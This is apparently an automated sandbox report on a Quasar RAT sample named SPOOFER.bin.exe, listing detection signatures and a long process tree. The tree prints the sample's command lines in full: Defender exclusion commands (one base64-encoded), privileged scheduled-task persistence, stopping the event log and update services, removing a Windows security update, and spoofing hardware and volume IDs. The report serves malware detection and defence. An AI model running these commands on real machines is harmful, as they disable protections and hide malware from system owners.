Malware Analysis Report

2025-01-18 04:20

Sample ID 231228-xkr96sdea7
Target SPOOFER.bin.exe
SHA256 18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc
Tags
quasar office04 evasion persistence spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc

Threat Level: Known bad

The file SPOOFER.bin.exe was found to be: Known bad.

Malicious Activity Summary

quasar office04 evasion persistence spyware trojan

Quasar RAT

Quasar payload

Nirsoft

Creates new service(s)

Stops running service(s)

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Maps connected drives based on registry

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-28 18:55

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-28 18:55

Reported

2023-12-28 18:58

Platform

win7-20231215-en

Max time kernel

1s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe N/A

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 1PJI-4306

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ClientC" /sc MINUTE /mo 5 /tr "'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Volumeid64V" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qDwW3x7lSK.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Music\Sample Music\smss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Music\Sample Music\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Public\Music\Sample Music\smss.exe'" /rl HIGHEST /f

C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe

"C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Music\Sample Music\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Volumeid64" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Volumeid64V" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Client" /sc ONLOGON /tr "'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ClientC" /sc MINUTE /mo 9 /tr "'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'" /f

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 1PJI-4306

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717864HP-TRGT27470MST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317864HP-TRGT27470DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617864HP-TRGT27470FU

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417864HP-TRGT27470FA

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517864HP-TRGT27470SL

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817864HP-TRGT27470SG

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217864HP-TRGT27470RV

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17864HP-TRGT27470AB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517881HP-TRGT15676SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617881HP-TRGT15676FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717881HP-TRGT15676MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317881HP-TRGT15676DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417881HP-TRGT15676FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817881HP-TRGT15676SG

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\VC_redist.x64.exe

C:\ProgramData\VC_redist.x64.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "driverupdate"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "driverupdate"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517897HP-TRGT3882SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717897HP-TRGT3882MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317897HP-TRGT3882DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617897HP-TRGT3882FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417897HP-TRGT3882FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817897HP-TRGT3882SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217897HP-TRGT3882RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17897HP-TRGT3882AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217881HP-TRGT15676RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17881HP-TRGT15676AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: E599-KPK5

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: E599-KPK5

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: Z7F8-9TBH

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: Z7F8-9TBH

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: UM6T-ZO0D

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: UM6T-ZO0D

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: BLKE-U3J4

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: BLKE-U3J4

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: EZAT-10UA

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: EZAT-10UA

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: H2H9-L1OA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: H2H9-L1OA

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: N33L-K7M9

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: N33L-K7M9

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: E9LC-7ELM

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: E9LC-7ELM

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: SIC4-96Z2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: SIC4-96Z2

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: CNET-RFTN

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: CNET-RFTN

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: D6CT-S1IL

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: D6CT-S1IL

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 45B3-4O51

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 45B3-4O51

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4EMT-BP7S

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4EMT-BP7S

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: POVC-BDRB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: POVC-BDRB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TTCG-MGAK

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TTCG-MGAK

C:\Windows\System32\cmd.exe

